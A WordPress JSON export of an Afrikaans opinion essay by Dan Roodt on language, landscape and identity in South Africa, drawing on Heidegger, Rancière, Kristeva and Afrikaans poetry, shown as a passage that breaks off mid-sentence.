{"id":9,"date":"2014-09-29T13:43:26","date_gmt":"2014-09-29T12:43:26","guid":{"rendered":"http:\/\/ensovoort.com\/wordpress\/?p=1"},"modified":"2014-09-29T13:43:26","modified_gmt":"2014-09-29T12:43:26","slug":"taal-landskap-identiteit","status":"publish","type":"post","link":"http:\/\/ensovoort.co.za\/index.php\/2014\/09\/29\/taal-landskap-identiteit\/","title":{"rendered":"Taal, landskap en identiteit"},"content":{"rendered":"<div style=\"text-align:left\"><a class=\"wpptopdfenh\" target=\"_blank\" rel=\"noindex,nofollow noopener\" href=\"http:\/\/ensovoort.com\/taal-landskap-identiteit\/?format=pdf\" title=\"Download PDF\"><img decoding=\"async\" alt=\"Download PDF\" src=\"http:\/\/ensovoort.com\/wordpress\/wp-content\/plugins\/wp-post-to-pdf-enhanced\/asset\/images\/pdf.png\"><\/a><\/div>\n<div style=\"text-align:left\"><a class=\"wpptopdfenh\" target=\"_blank\" rel=\"noindex,nofollow noopener\" href=\"http:\/\/ensovoort.com\/taal-landskap-identiteit\/?format=pdf\" title=\"Download PDF\"><img decoding=\"async\" alt=\"Download PDF\" src=\"http:\/\/ensovoort.com\/wordpress\/wp-content\/plugins\/wp-post-to-pdf-enhanced\/asset\/images\/pdf.png\"><\/a><\/div>\n<div style=\"text-align:left\"><a class=\"wpptopdfenh\" target=\"_blank\" rel=\"noindex,nofollow noopener\" href=\"http:\/\/ensovoort.com\/taal-landskap-identiteit\/?format=pdf\" title=\"Download PDF\"><img decoding=\"async\" alt=\"Download PDF\" src=\"http:\/\/ensovoort.com\/wordpress\/wp-content\/plugins\/wp-post-to-pdf-enhanced\/asset\/images\/pdf.png\"><\/a><\/div>\n<p>Dan Roodt<\/p>\n<p>Die kwessie rondom taal is besig om di\u00e9 aangaande ras te vervang as die belangrikste enkele strydpunt in Suid-Afrika. Selfs gedurende die grondwetlike onderhandelinge tussen die Nasionale Party en die ANC tydens die aanloop tot die 1994-verkiesing het slegs drie vraagstukke hul onderskeie standpunte geskei, naamlik eiendomsreg, die sogenaamde uitsluitingsklousule (waarvolgens \u2019n werkgewer stakende werkers kon uitsluit), en natuurlik, die reg op, of soos dit geblyk het, die keuse van moedertaalonderrig in staatskole. Die berugte rassevraagstuk het nie eens ter sprake gekom nie, wat sekerlik vreemd mag aandoen aan enigiemand buite Suid-Afrika waar rassesegregasie of die woord \u201capartheid\u201d ewe beskrywend van ons geag word as byvoorbeeld \u201crewolusie\u201d van Frankryk.<\/p>\n<p>Maar dit wat hier volg, is geen politieke geskrif of poging om tot \u2019n politieke debat toe te tree nie, hoe gepolitiseer die taalkwessie in Suid-Afrika ook al mag wees. In die eerste plaas gaan dit vir my om \u2019n besinning oor \u2019n ervaring van vreemdelingskap in my eie land, \u2019n soort interne eksiel of ballingskap waarmee ek daagliks as nie-Engelse persoon gekonfronteer word. Op pad tussen Stellenbosch en Franschhoek, in een van die oudste en mees oorwegend Afrikaanse dele in die land, sien ek \u2019n reusagtige groot padteken wat tweetalig in Engels en Xhosa aangebring is. Op my paspoort is daar deesdae net Engels en Frans, wat my daaraan herinner dat die Suid-Afrikaanse staat kwalik meer Afrikaans as taal erken, hoewel dit in naam steeds een van elf amptelike tale is. Rondom my is daar vele Afrikaners, vele stoere Afrikaners moet \u2019n mens byvoeg, wat angsvallig besig is om hul kinders in Engels op te voed, kinders met name soos \u201cJustin\u201d en \u201cMegan\u201d, asof die ouers reeds geestelik verhuis het na \u2019n Engelssprekende land en nie hul spruite met onuitspreekbare Germaans-klinkende name wou opsaal nie.<\/p>\n<p>\u2019n Kafkaeske waas kleef aan dit alles, asof ons almal skuldig is aan \u2019n onnoembare misdaad en nou daarvoor moet boetedoen deur ontneem te word van ons kulturele burgerskap. Die verskriklike gemeenplaas \u201capartheid\u201d het sekerlik iets daarmee te doen, maar verduidelik nogtans nie alles nie. Buitendien ervaar ek reeds jare lank hierdie Afrikaanse woord as iets vreemds en onsinnigs, \u2019n versameling letters wat ek vir die eerste keer gesien het toe ek \u2019n straat oorsteek in \u2019n vreemde stad in \u2019n vreemde land waar dit skielik in wit op die pad geverf voor my opgedoem het.<\/p>\n<p>Denke oor taal en kultuur in Suid-Afrika behaal sy absurdste hoogtepunte juis op amptelike of kwasi-amptelike vlak. In hierdie verband herinner \u2019n mens jou die uitspraak van regter Johann Kriegler wat beweer het dat indien twee Yslandse kinders \u2019n Afrikaanse skool sou bywoon, die hele skool sy onderrigmedium na Yslands behoort te verander. Miskien is Ysland hier \u2019n metafoor vir die amptelike kilheid jeens Afrikaans, of miskien was dit \u2019n subtiele manier om te s\u00ea dat Afrikaans net soos Oud-Yslands, daardie belangrike liter\u00eare taal van die sages, sou kon vergaan om iewers in die toekoms net deur spesialiste begryp te word.<\/p>\n<p>Ek sou graag hier wou aanhaal uit die Oud-Yslands, maar as \u2019n plaasvervanger deel ek graag met die leser die volgende frase van Reinhart die Vos in die Middel-Nederlandse weergawe:<\/p>\n<blockquote>\n<p>Het staet so, suldi hebbe vrome,<br \/>\nHier ne mach zijn geen langher staen.<br \/>\nVolghet mi, ic sal voeren gaen.<br \/>\nWi houden desen crommen pat,<\/p>\n<\/blockquote>\n<p>wat rofweg die volgende beteken: \u201cons kom n\u00earens deur langer te talm nie, volg my, ek gaan voor, ons neem di\u00e9 kronkelende pad.\u201d Omdat ons Reinhart ken, weet ons dat dit ietwat riskant is om enige kronkelende pad met hom aan te durf. S\u00f3 ook die huidige teks, wat begin met \u2019n kronkelende rit per motor tussen Johannesburg en die Hartebeespoortdam, \u2019n heel opwindende tog deur rante en klowe wat met aalwyne, verknoetste kareebome en rotsblokke van ysterklip besaai is, br\u00fbe oor spruite en riviere, asook skielike draaie en hoogtes wat teen \u2019n sekere spoed ontstemmend kan raak.<\/p>\n<p>Niks kan meer skokkend wees in die Franse sin van <em>chocquant<\/em>, as juis die oorgang vanaf, s\u00ea maar, Sandton City of die Rosebank Mall, na die Magaliesberg via daardie kronkelpad nie. \u2019n Mens sou dit \u2019n Proustiaanse verplasing kon noem, dog sonder om reg aan Proust te laat geskied aangesien syne nooit per motor plaagevind het nie, slegs per trein. Die Europese reisiger is gewoond daaraan om vir twee ure te ry en agterna hom in \u2019n ander land te bevind, met \u2019n ander taal, \u2019n ander mentaliteit, ander gewoontes, kookkuns, gebare, plekname wat moeilik is om uit te spreek. Anderkant die Hartebeespoortdam l\u00ea distrikte soos Elandskraal, Mooinooi, die dorpe Rustenburg en Brits, die \u201cdiep platteland\u201d soos dit bekend was in die politieke joernalistiek van die ou Suid-Afrika. Dog, anders as op die Europese Vasteland, heg die welaf Engelse inwoners van noordelike Johannesburg n\u00f3g waarde aan die kultuur, die taal, die kookkuns, die geskiedenis van hul bure agter die berg, n\u00f3g toon hulle hoegenaamd enige belangstelling daarin. Op \u2019n manier is hulle soos Brittanje se Euroskeptici: hulle staan vyandig teenoor die nie-Engelse, hulle vrees hul komplekse gewoontes en gevoelighede, hulle verag hul gebrek aan Engelse gesonde verstand (\u201ccommon sense\u201d). \u2019n Mens kan nie anders as om \u2019n verband te sien tussen Me Metcalfe se veldtog vir die Engelse taal in skole en die stelling \u2019n rukkie terug van mnr John Major, toe nog leier van die Tories, dat \u201cEngeland die baarmoeder van die Westerse beskawing\u201d is nie. Vergeet van die Grieke, die Romeine, die Italianers, die Franse, die Duitsers, slegs Engeland het kaart en transport vir die Westerse erfenis.<\/p>\n<p>Daar is tekens dat die platteland \u2014 daardie ironiese term vir dit wat onplat voor ons uitstrek \u2014 en sy kultuur wat veel meer omvat as bloot die Afrikaanse taal, voortaan aan \u2019n destruktiewe vorm van herkolonisering, afrikanisering, noem dit wat jy wil, onderwerp gaan word, iets wat na my mening verreikende implikasies het nie net vir die Suid-Afrikaanse kultuur as geheel nie, maar vir ons syn en wese in Suid-Afrika.<\/p>\n<p>Heidegger in sy reaksie op die onafwendbare indringing van tegnologie binne die menslike bestaan het twee houdings geformuleer wat ons behoort in te neem en wat ons mag red as denkende wesens met \u2019n estetiese projek op aarde. Die eerste is \u201c<em>Gelassenheit zu den Dingen<\/em>\u201d <a class=\"simple-footnote\" title=\"Heidegger, Martin. Gelassenheit. Pfullingen: Verlag G\u00fcnther Neske, 1959.\" id=\"return-note-1-1\" href=\"#note-1-1\"><sup>1<\/sup><\/a>, wat letterlik in Afrikaans vertaal kan word as \u201cgelatenheid teenoor dinge\u201d. Dit is \u2019n manier van beide ja en nee te s\u00ea teenoor die veranderinge, tegnologies en andersins, wat \u2019n uitwerking op ons het. Die tweede houding is \u201c<em>\u00d6ffenheit f\u00fcr das Geheimnis<\/em>\u201d, wat weer eens letterlik \u201coopheid teenoor die geheimenis\u201d beteken. Beide hierdie opvattinge het betrekking op die menslike wese as \u2019n gewortelde entiteit, gewortel ook in sy geboorteland, sy \u201c<em>pays<\/em>\u201d soos die Franse s\u00ea. Heidegger haal die Duitse digter Johann Peter Hebel aan waar hy s\u00ea:<\/p>\n<blockquote>\n<p>Ons is plante wat \u2014 of ons dit wel erken of nie \u2014 met ons wortels uit die aarde moet opgroei ten einde in die eter te bloei en vrugte te dra.<\/p>\n<\/blockquote>\n<p>Die koloniale ervaring is \u2019n ontwortelde en ontwortelende, wat in die huidige konteks die estetiese armoede van koloniale kultuur verklaar. Die eindelose moralisme en stereotipering van wat veral in die buiteland bekend staan as \u201cSouth African literature\u201d val na my mening binne die kategorie van koloniale kultuur. Daarteenoor staan iets soos die onlangse werke van Karel Schoeman, veral die roman <em>Hierdie Lewe<\/em> <a class=\"simple-footnote\" title=\"Schoeman, Karel. Hierdie Lewe. Kaapstad: Human &amp; Rousseau, 1993.\" id=\"return-note-1-2\" href=\"#note-1-2\"><sup>2<\/sup><\/a>, wat \u2019n ho\u00eb vlak van \u201c\u00d6ffenheit f\u00fcr das Geheimnis\u201d openbaar in die gevoelvolle beskrywings van die Karoo <a class=\"simple-footnote\" title=\"Sien byvoorbeeld die beskrywing op bladsy 10, ibid., wat begin &#8220;Helder land, glansende silwergrys land wat voor my wegdrywe in die nag, waar ek verwonderd sien hoe elke tak van die harpuisbos glinster soos die digte spirale van sy blaartjies die skynsel van die lig weerkaats en elke rots dof gloei teen die rante &#8230;&#8221;\" id=\"return-note-1-3\" href=\"#note-1-3\"><sup>3<\/sup><\/a>, die uitgestrektheid van die landskap en die ongenaakbaarheid van die karakters. Dit lyk asof hy iets vasvang van die tragedie van \u2019n Karoobestaan tydens die vorige eeu, en by uitbreiding, van die hele platteland. Historici het al dikwels aanmerkings gemaak oor die ekonomiese wankelrigheid van \u2019n plattelandse bestaan in Suid-Afrika, die gebrek aan standhoudende en voorspelbare re\u00ebnval, wat tot die nomadisme van beide die Trekboere en swart stamme uit vorige eeue gelei het. Om dus die landskap te beskou is om in \u2019n sekere sin jou o\u00eb te laat gaan oor \u2019n <em>Leidensgeschichte<\/em>, die bitter geskiedenis van soveel pogings om te oorleef op meesal dro\u00eb of brak grond.<\/p>\n<p>Die geskiedenis van Engels in Suid-Afrika is, behalwe Natal, hoofsaaklik \u2019n stedelike verhaal, sonder woorde om die besonderhede van ons landskap met sy \u201ckoppies\u201d en \u201crante\u201d uit te druk, sy \u201cklowe\u201d en \u201cskeure\u201d, en geen plekname wat die wanhoop van \u201cPutsonderwater\u201d vervat, of die waterobsessies wat hul in soveel \u201c-fonteine\u201d en \u201c-spruiteoor\u201d die hele land herhaal. Die verhaal van die platteland is duidelik \u2019n Afrikaanse, en die paring van taal en landskap oor die eeue heen het \u2019n spesifiek plaaslike kultuur geproduseer, wat uiteindelik groot gewig behoort te h\u00ea binne die hutspot van \u2019n Suid-Afrikaanse kultuur. In die mate waartoe Afrikaners en Suid-Afrikaanse swartes tot die Engelse kultuur bydra, staan hulle in dieselfde verhouding tot Engeland as die Skotte, die Walliesers en die Iere: die grootsheid van Engelse of Britse kultuur, ten minste sover dit die letterkunde betref, is te wyte aan die pogings van kunstenaars en skrywers vanuit die geledere van die oorwonne volke wat poog om hul eie sin van waardeloosheid en minderwaardigheid te besweer deur die voortreflikheid van hul werke.<\/p>\n<p>Die Engelse media, en veral die dommer-as-dom buitelandse media, stel die platteland voor as die ligging van wit fascisme, enersyds, en swart armoede, andersyds. Kultureel gesproke is dit ontdaan van enige belang. En tog, tensy \u2019n mens aan \u2019n laat vorm van sosiale realisme glo, kan alle fasette van menslike bestaan nie gepolitiseer word nie. As die monochroombril van sosio-politieke clich\u00e9 afgehaal word, raak die platteland inderdaad kleurvol, welluidend met die stemme van ongekunstelde dog goedgeaarde mense.<\/p>\n<p>Die fassinasie van die volk, <em>le peuple, das Volk, the people<\/em>, vir intellektuele is bespreek deur Jacques Ranci\u00e8re in sy boek <em>Courts voyages au pays du peuple<\/em> <a class=\"simple-footnote\" title=\"Ranci\u00e8re, Jacques. Courts voyages au pays du peuple. Parys: Ed. du Seuil, 1990.\" id=\"return-note-1-4\" href=\"#note-1-4\"><sup>4<\/sup><\/a> \u2014 \u201cKort reise deur die land van die volk.\u201d Volgens hom is die platteland baie nader aan ons as wat ons vermoed:<\/p>\n<blockquote>\n<p>ces contre\u00e9s toutes proches qui offrent au visiteur l\u2019image d\u2019un autre monde. De l\u2019autre c\u00f4t\u00e9 du d\u00e9troit, un peu \u00e0 l\u2019\u00e9cart du fleuve et de la grand-route, au bout de la ligne des transports urbains, vit un autre peuple, \u00e0 moins que ce ne soit simplement le peuple. Le spectacle impr\u00e9vu d\u00fane autre humanit\u00e9 s\u2019offre sous ses diverses figures: retour \u00e0 l\u2019origine, descente aux enfers, av\u00e8nement de la terre promise. <a class=\"simple-footnote\" title=\"ibid., bl. 7.\" id=\"return-note-1-5\" href=\"#note-1-5\"><sup>5<\/sup><\/a><\/p>\n<p>[hierdie nabygele\u00eb kontreie wat aan die besoeker \u2019n blik op \u2019n ander w\u00eareld bied. Oorkant die d\u00e9troit, ietwat verwyder van die rivier of die grootpad, aan die einde van die stedelike vervoerstelsel, leef \u2019n ander volk, \u2019n mens sou sover kon gaan om te s\u00ea: die volk. Die onverwagse skouspel van \u2019n ander mensdom bied hom in verskeie vorme aan: terugkeer na die oorsprong, hellevaart, koms van die beloofde land.]<\/p>\n<\/blockquote>\n<p>Ten spyte van die kultuurapartheid van die nuwe Suid-Afrika wat die platteland wil amputeer ten behoewe van \u2019n stedelike Engelse en grotendeels ingevoerde Hollywoodkultuur, herken ons die volk as Afrikaans. Selfs die swartes hier praat Afrikaans. Eug\u00e8ne Marais se Waterberg, Breyten Breytenbach se Wellington of Bonnievale, dit alles is maar inkarnasies van hierdie l\u201cand van die volk\u201d binne Ranci\u00e8re se definisie. Dit is waar ons wortels heen strek, waaruit die digter sy inspirasie put of waar ons gewoon die modes en pretensie van die stad afskud en wegl\u00ea aan \u2019n bredie en wyn wat in \u2019n blikbeker geskink kan word.<\/p>\n<p>Die platteland en die volk wat dit bewoon, is egter veelduidig, soos ook uit die hierbo-aangehaalde gedeelte blyk: dit kan \u00f3f hellevaart \u00f3f beloofde land, of selfs iets anders wees. Trouens, die grond, die bodem is ideologies dubbelsinnig. Die grond is enersyds die lokus van identiteit en nasionalisme, selfs fascisme, maar terselfdertyd is dit die eindbestemming van rewolusion\u00eare vooruitgang waar grondlose kleinboere of die proletariaat oplaas weer hervestig kan word sodat hulle die verlore Eden mag terugvind van waar hulle verjaag is deur die kapitalisme, kolonialisme en apartheid. In Duitsland is die <em>Blut und Boden<\/em>-slagspreuk uit die dertigerjare vervang deur die groen \u201cterug-na-die-natuur\u201d, twee o\u00ebnskynlik teenoorgestelde bewegings.<\/p>\n<p>In Suid-Afrika word die sin van die grond en by uitbreiding van die platteland verder gekompliseer deur die nomadiese tradisies van die verlede. Die afsku waarmee \u2019n sedent\u00eare Engels-koloniale bewind die rustelose Trekboere beje\u00ebn het, is verwant aan die idee dat hulle besig was om weg te trek van die beskawing as sodanig, dat hulle as \u2019t ware op vlug geslaan het voor die beskawing self. Hierdie paradoks van Europese nomades word soos volg beskryf deur De Kiewiet in sy <em>History of South Africa<\/em> <a class=\"simple-footnote\" title=\"De Kiewiet, CW. A history of South Africa, social and economic. Londen: Oxford Univ Press, 1942.\" id=\"return-note-1-6\" href=\"#note-1-6\"><sup>6<\/sup><\/a> waar hy met kenmerkende Engelse afkeur opmerk:<\/p>\n<blockquote>\n<p>In the long quietude of the eighteenth century the Boer race was formed. In the vast, unmysterious, thirsty landscape of the interior lay the true centre of South African settlement. When the Trekboers entered it with their flocks and tented wagons, they left the current of European life and lost the economic habits of the nations from which they had sprung. Though they never became true nomads, the mark of nomadism was upon them, and their dominant traits were those of a restless and narrow existence. They had the nomad\u2019s appetite for space and possessed the hardness and courage of men of the saddle who watch their flocks and hunt their meat. Their wealth was in their cattle and in their sons and grandsons, who were born numerously and who thrived amazingly. Their life gave them a tenacity of purpose, a power of silent endurance, and the keenest self-respect. But this isolation sank into obstinacy, their power of endurance into resistance to innovation, and their self-respect into suspicion of the foreigner and contempt for their inferiors. For want of formal education and sufficient pastors, they read their Bibles intensively, drawing from the Old Testament, which spoke the authentic language of their lives, a justification of themselves, of their beliefs and their habits. <a class=\"simple-footnote\" title=\"ibid, bl 17.\" id=\"return-note-1-7\" href=\"#note-1-7\"><sup>7<\/sup><\/a><\/p>\n<\/blockquote>\n<p>Waarskynlik sou di\u00e9 teks m\u00f4re op CNN gelees kon word apropos van Afrikaners vandag, en niemand sou \u2019n wenkbrou daaroor lig nie. Hierdie beperkte siening van die Boer en die Afrikaner wat neffens die Europese beskawing leef of geleef het, geld nog steeds. Op \u2019n manier word die platteland of binneland nog altyd gesien as onaanloklik (\u201cforbidding\u201d). Die koloniale afsku vir die binneland en sy inwoners is magistraal beskryf deur Peter Blum in sy satiriese gedig \u201cRooinekke op Hermanus\u201d wat in jukstaposisie met De Kiewiet se siening aangehaal kan word.<\/p>\n<blockquote>\n<p>O gestilde<br \/>\nsinnebeeldvo\u00ebls, simboolvlerke, jul pryk<br \/>\nteen sononder, klaar met dool, enkel embleem<br \/>\nvan hierdie seksie onwilde, ongewilde<br \/>\nvasgemeerde, aarde-agterhaalde ryks-<br \/>\narende, pensioentrekkers op ou roem,<br \/>\nwat koel staan teenoor \u00f3ns rumoer, kil-vreemd<br \/>\n\u2014 nie aanvoel wat \u00f3ns bedoel, \u00edn ons woel:<br \/>\nhartstog-verleerde, wrok-onbegrypende<br \/>\nsege-moeg, effens geaffronteerde<br \/>\nsee-afkykers, agterland-afgekeerdes<br \/>\nwat hoegenaamd niks nie brandelik begeer. <a class=\"simple-footnote\" title=\"Blum, Peter. &#8221;Rooinekke op Hermanus&#8221; in Steenbok tot poolsee. Kaapstad: Tafelberg, 1974.\" id=\"return-note-1-8\" href=\"#note-1-8\"><sup>8<\/sup><\/a><\/p>\n<\/blockquote>\n<p>Blum, \u2019n Duitser, skryf hier in sy aangenome taal, Afrikaans. Dit is miskien ironies dat hy moes doodgaan in \u2019n gestig in Engeland, tuiste van die rooinekke. In \u2019n sekere sin is hy \u2019n vreemdeling wat oor ander vreemdelinge skryf in \u2019n taal wat deur baie deesdae gesien word as synde \u2019n vreemde taal in die Engelse Suid-Afrika, iets wat jy net met onderskrifte kan verstaan. In die jargon van die nuwe Suid-Afrika sou Blum nie kwalifiseer vir die benaming \u201cSouth African writer or poet\u201d nie. Dit is \u2019n eienaardige verwikkeling aangesien die ryksarende van die gedig, wat hul pensioen trek op ou roem, skynbaar hulself op die oneerbiedige digter gewreek het. Hul gebrek aan hartstog, hul \u201ckil-vreemdheid\u201d het hulle kennelik goed te pas gekom; die digter het nou iets van \u2019n uitgestorwe spesie geword, nie die ryksarend nie. Maar tydens die gedig \u2014 vir \u2019n oomblik \u2014 vier ons die majesteit van daardie innerlike of binnelandse ruimte, daardie land wat Hermanus omring en waarvan die ryksarende as \u201cagterland-afgekeerdes\u201d hulself afgesluit het. Dit is \u2019n land, die land van die digkuns, waar elkeen en niemand \u2019n vreemdeling is nie.<\/p>\n<p>De Kiewiet besef waarskynlik nie dat nomadisme en chauvinisme mekaar uitsluit nie, want die nomade bewerkstellig nie \u2019n verhouding met die grond wat stabiel genoeg is om as outochtoon gereken te word en dus ander as vreemdelinge te sien nie. Die Boere is \u201cobstinaat\u201d omdat hulle nie die Britse bewind wou aanvaar nie, en kultureel nie hulself wou verengels in \u2019n beskaafde Engelse Suid-Afrika nie. As historikus van die ryksarende beje\u00ebn hy hulle met al die chauvinistiese veragting waartoe die beskaafde man in staat is wanneer hy van aangesig tot aangesig met die barbaarse nomade verkeer. En ook: die proses van trek maak van die Boere vreemdelinge-in-wording wat die Westerse beskawing verlaat en sodoende verafrikaans in die mees radikale sin. Op \u2019n stadium gaan \u2019n mens die proses moet ondersoek waardeur die Engelse afkeer van Afrika en rassisme wat aanvanklik op barbare van alle rasse en kulture gefokus was, deur \u2019n Freudiaanse vorm van \u201coordrag\u201d uitsluitlik tot Afrikanerhaat en veral onderdrukking van die Afrikaanse taal as \u2019t ware \u201cgedistilleer\u201d is. (Dit is \u2019n Freudiaans-Lacaniaanse projek-in-die-kleine wat heel prettig mag wees, aangesien \u201coordrag\u201d ook een van die belangrikste onderliggende konsepte was by daardie resente Amerikaanse mode wat iets met \u201ccon\u201d te make het soos in \u201cdecon &#8230;\u201d en \u201cd\u00e9conner\u201d, om nie van die \u201cconnards\u201d te vergeet nie.)<\/p>\n<p>Die beweging van mense op die grond, en selfs die wortelskiet van hul kultuur, hul taal en die naamgewing wat ontstaan uit hul interaksie en waarneming van die omgewing, die benoeming van bome en vo\u00ebls en diere, dit alles vind binne menslike tyd plaas. Die landskap verander egter baie stadig, ongemerk binne geologiese tyd wat mensewesens beswaarlik kan voorstel. In \u2019n sekere sin is menslike kultuur dus vreemd aan die land, en selfs ons spesie is \u2019n immigrantespesie wat vandag hier mag wees en m\u00f4re nie meer nie.<\/p>\n<p>Na my mening is daar steeds \u2019n humanistiese en daarom antropomorfiese element aan Heidegger se begrip van kultuur as \u2019n vorm van organiese groei, waarna hierbo verwys is. Dit is waar dat kultuur moeilik kan bestaan sonder wortels: die <em>d\u00e9racin\u00e9s<\/em> binne Suid-Afrikaanse konteks woon slegs hier om die lekker inkopies, en hulle migreer maklik na waar die inkopies beter is (of miskien veiliger). Die plattelander, daarenteen, staar \u2019n bietjie soos Tityrus in Vergilius se eerste Herdersgedig <a class=\"simple-footnote\" title=\"P Vergilius Maro. Bucolica et georgica. Basingstoke en Londen: Macmillan, 1972, bll 1-3.\" id=\"return-note-1-9\" href=\"#note-1-9\"><sup>9<\/sup><\/a> na die grootte van Rome wat oor Naboomspruit toring soos die statige sipres oor die beskeie <em>vibernum<\/em>, en besluit dat hy die eenvoudige, sto\u00efsynse lewe verkies bo die inkopies te midde van die stadsrumoer. Dog soms het hy geen keuse nie, soos Meliboeus wat van sy grond afgesit is vanwe\u00eb \u2019n gebrek aan politieke vriende in Rome. Uiteindelik speel die kans \u2019n rol daarin of \u2019n mens toegelaat sal word om aan te bly of gedwing sal word om te vertrek, of \u2019n mens jou wortels gaan behou of nie. Daar bestaan iets soos \u2019n taalkundige ekologie, en tale, soos spesies, is besig om uit te sterf. Anders as Darwin se idee van natuurlike seleksie, word die proses van uitsterwing grootliks gedryf deur toevallige gebeure, deur die kans. Die ekologie, taalkundig of andersins, is \u2019n stogastiese proses. Daar word ges\u00ea dat 99,9% van alles spesies wat ooit op aarde bestaan het, reeds uitgesterf het. Die taalkundige verskeidenheid van die platteland mag kwesbaar wees vir die funeste gevolge van \u2019n toevallige gebeurtenis, wat die vorm van \u2019n droogte mag aanneem, of die goudprys op $200, of \u2019n besluit in Rome.<\/p>\n<p>Is ons almal vreemdelinge? Dit is waarskynlik die siening van Julia Kristeva waar sy s\u00ea:<\/p>\n<blockquote>\n<p>\u00c9trangement, l\u2019\u00e9tranger nous habite : il est la face cach\u00e9e de notre identit\u00e9, l\u2019espace qui ruine notre demeure, le temps o\u00f9 s\u2019ab\u00eeme l\u2019entente et la sympathie. De le reconna\u00eetre en nous, nous nous \u00e9pargnons de le d\u00e9tester en lui-m\u00eame. Sympt\u00f4me qui rend pr\u00e9cis\u00e9ment le &lt;&gt; probl\u00e9matique, peut-\u00eatre impossible, l\u2019\u00e9tranger commence lorsque surgit la conscience de ma diff\u00e9rence et s\u2019ach\u00e8ve lorsque nous nous reconnaissons tous \u00e9trangers, rebelles aux liens et aux communaut\u00e9s. <a class=\"simple-footnote\" title=\"Kristeva, Julia. Etrangers \u00ef\u00bf\u00bd nous-m\u00ef\u00bf\u00bdmes. Parys: Fayard, 1988, bl 9.\" id=\"return-note-1-10\" href=\"#note-1-10\"><sup>10<\/sup><\/a><\/p>\n<p>[Vreemd genoeg woon die vreemdeling binne-in ons: hy is die keersy van ons identiteit, die ruimte wat ons tuiste ru\u00efneer, die tyd waarin wedersydse begrip en meegevoel afbreek. Deur dit binne-in ons te herken, vermy ons dit om dieselfde ding in hom te verag. \u2019n Simptoom wat juis die \u201cons\u201d problematies maak, miskien selfs onmoontlik, die vreemdeling begin sodra die bewustheid van my andersheid na vore tree en word voltooi sodra ons onsself herken as synde almal vreemdelinge, rebelle teenoor bande en teenoor gemeenskappe.]<\/p>\n<\/blockquote>\n<p>In terme hiervan word \u2019n mens \u2019n vreemdeling \u2014 \u201cvolksvreemd\u201d! \u2014 sodra jy teen die gemeenskap rebelleer, of selfs bewus raak van jou eie individualisme. Die platteland is geen vreemdeling as dit by rebellie kom nie, gedagtig aan 1914 of Van Melle se <em>Bart Nel<\/em> <a class=\"simple-footnote\" title=\"Van Melle, J. Bart Nel. Pretoria: JL van Schaik, 1981.\" id=\"return-note-1-11\" href=\"#note-1-11\"><sup>11<\/sup><\/a>, maar is miskien minder verdraagsaam teenoor anderse individue as die stad. Aan die ander kant, deur sy andersheid te behou teenoor die imperiale hinterland van nywerheid en handel, sy ekologie te handhaaf, brei die platteland miskien sy dade van rebellie uit. Kollektief is die platteland tot vreemdeling verklaar, wat miskien lig daarop werp waarom vreemdelinge nie so goed behandel word in sy midde nie.<\/p>\n<p>\u2019n Verwante probleem aan di\u00e9 van vreemdeling-wees (of di\u00e9 van setlaar en boorling) is di\u00e9 van suiwerheid. Op verskillende tye sal verskeie \u201cgroepe\u201d \u2014 ek gebruik doelbewus \u2019n gelade term uit die onlangse verlede \u2014 aanspraak daarop maak om waaragtig inheems te wees. Hulle was eerste daar, dis die land van h\u00fal voorvaders, hulle is die meerderheid, of die uitverkore minderheid, wat die geval ook al mag wees. Hierdie aanspraak is van dieselfde tipe as die aanspraak op rassesuiwerheid, want dit veronderstel \u2019n goddelike of regskape oorsprong. Dus het ons gevorder vanaf \u2019n ideologie van rassesuiwerheid tot nedersettingsuiwerheid. Die amptelike siening van die Afrikaanse taal het ge\u00ebvolueer vanaf die siening onder die Britse bewind in die Kaap tydens die negentiende eeu dat dit die resultaat was van ras- en taalvermenging, wat toentertyd afkeurenswaardig was, na die huidige voorstelling van beide die ANC en die Engelstalige media van \u2019n wit Afrikanertaal wat gestigmatiseer is deur apartheid en gepaardgaande neigings tot rassesuiwerheid en eksklusiwiteit. Duidelik is geeneen van hierdie sienings korrek as dit gemeet word aan taalkundige of demografiese kriteria nie. Wat ons hier sien, is \u2019n soort omgekeerde diachroniese dialektiek waar die boosheid van gister figureer as die goeie van vandag, en andersom.<\/p>\n<p>Ook die fassinasie met die ontstaan van Afrikaans as taal wat uiting gevind het in vele taalkundige teorie\u00eb sedert die negentiende eeu moet in hierdie lig gesien word. Tot vandag toe word die opvatting van Valkhoff gehuldig dat Afrikaans \u2019n soort Kreoolse taal is wat sy oorsprong had in die pidginisering van Nederlands deur die Koen-bevolking of Hottentotte. In die negentiende eeu is hierdie gemengde herkoms van Afrikaans gesien as bron van onsuiwerheid, as \u201ckitchen Dutch\u201d, \u2019n term wat die taalkundige verbastering moes benoem wat die taal nie waardig gemaak het om soos die Europese tale oor \u2019n Bybelvertaling te beskik nie. Watter ironie is dit nie dus dat Afrikaans vandag juis as rassuiwere witmanstaal voorgehou word nie, die dialek van die AWB en dergelike. Binne die kleinlike rastaalpolitiek van Suid-Afrika het Afrikaans daarom binne die bestek van \u2019n eeu gevorder van nie-blanke taal tot blanke taal, ongelukkig in omgekeerde orde van politieke korrektheid.<\/p>\n<p>Binne \u2019n gesonde-verstandparadigma het kultuur, ekologie, musiek, kuns, letterkunde, al daardie elemente wat as buitensporig, of <em>en<\/em> <em>trop<\/em> soos die Franse s\u00ea, beskou kan word, geen plek nie. Daar is \u2019n besonder Engelse vorm van gesonde verstand (<em>common sense<\/em>) wat onhebbelik kan wees. Dit is van die soort wat alles in terme van sy nut sien, en nie in terme van sy waarde (wat in elk geval \u2019n funksie van die mark is) nie. Gesonde verstand beskou die platteland as \u2019n blote produksiefasiliteit vir die graanmark, en taal as \u2019n kode vir die uitruil van inligting tussen verbruikers. Alles kan uiteindelik gereduseer word tot sy nutswaarde, en as dit nie daaroor beskik nie, kan dit vernietig word of weggegooi word. So is dit ook met identiteit, die kleur van \u2019n individu nie in die rassesin nie, maar in die etniese sin, selfs die stamsin. Waarom mag ons nie \u2019n stam h\u00ea nie, al is dit \u2019n wit stam? Waarom mag ons nie na Schoenberg luister nie, selfs al bestaan daar geen mark vir sy musiek nie? Waarom mag ons nie begeer nie, al is ons begeertes nie rasioneel nie?<\/p>\n<p>Die kritiek op gesonde verstand \u2014 teenoor die Kantiaanse <em>sensus communis<\/em> wat iets anders is \u2014 op na\u00efewe realisme en op na\u00efewe empirisme is weer eens grotendeels op die Europese Vasteland gevoer, en nie op die Britse Eilande nie. Kennelik kan dit gesien word as \u2019n oorvereenvoudiging van twee uiteenlopende filosofiese tradisies, maar binne die kulturele debat in ons land, veral die tweehonderdjaaroue botsing tussen Engels en Afrikaans, is hierdie digotomie tussen \u2019n kwasi-Angel-Saksiese en 